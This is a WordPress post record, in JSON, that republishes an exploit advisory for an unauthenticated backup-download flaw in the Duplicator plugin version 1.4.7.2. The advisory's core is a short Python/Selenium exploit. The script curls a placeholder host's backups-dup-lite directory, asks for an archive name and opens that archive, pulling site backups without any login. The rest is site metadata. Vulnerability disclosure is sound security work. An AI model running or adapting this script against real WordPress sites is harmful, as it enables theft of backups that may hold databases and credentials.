{"id":29499,"date":"2022-08-23T18:19:23","date_gmt":"2022-08-23T14:19:23","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168134\/wpduplicator1472-disclose.txt"},"modified":"2022-08-24T08:22:09","modified_gmt":"2022-08-24T03:52:09","slug":"wordpress-duplicator-1-4-7-2-backup-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-duplicator-1-4-7-2-backup-disclosure\/","title":{"rendered":"WordPress Duplicator 1.4.7.2 Backup Disclosure"},"content":{"rendered":"

## Title: WordPress Plugin Duplicator 1.4.7.2 – Unauthenticated Backup Download
\n## Author: nu11secur1ty
\n## Date: 08.23.2022
\n## Vendor: https:\/\/wordpress.org\/
\n## Software: https:\/\/wordpress.org\/plugins\/duplicator\/
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2<\/p>\n

## Description:
\nThe WordPress Plugin Duplicator 1.4.7.2 suffers from Unauthenticated
\nBackup Download, after an update from the 1.4.7.1 version.
\nThe attacker can download all archive information from the system by
\nusing this vulnerability!
\nStatus: CRITICAL<\/p>\n[+] Exploit:<\/p>\n

“`python
\n#!\/usr\/bin\/python
\n# Author nu11secur1ty
\nfrom selenium import webdriver
\nimport time
\nimport os<\/p>\n

print(“Test if you can access the directory\\n”)
\ntime.sleep(5)
\nos.system(‘curl http:\/\/pwned-host.com\/wordpress\/wp-content\/backups-dup-lite\/’)
\ntarget=input(“Give the name of the archive…\\n”)
\ndriver = webdriver.Chrome()
\ndriver.get(‘http:\/\/pwned-host.com\/wordpress\/wp-content\/backups-dup-lite\/’
\n+ target)<\/p>\n

“`<\/p>\n

## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/x0cvjh)<\/p>\n","protected":false},"excerpt":{"rendered":"

## Title: WordPress Plugin Duplicator 1.4.7.2 – Unauthenticated Backup Download ## Author: nu11secur1ty ## Date: 08.23.2022 ## Vendor: https:\/\/wordpress.org\/ ## Software: https:\/\/wordpress.org\/plugins\/duplicator\/ ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2 ## Description: The WordPress Plugin Duplicator 1.4.7.2 suffers from Unauthenticated Backup Download, after an update from the 1.4.7.1 version. The attacker can download all archive information from the system by …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29499","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29499","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29499"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29499\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29499"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29499"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29499"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}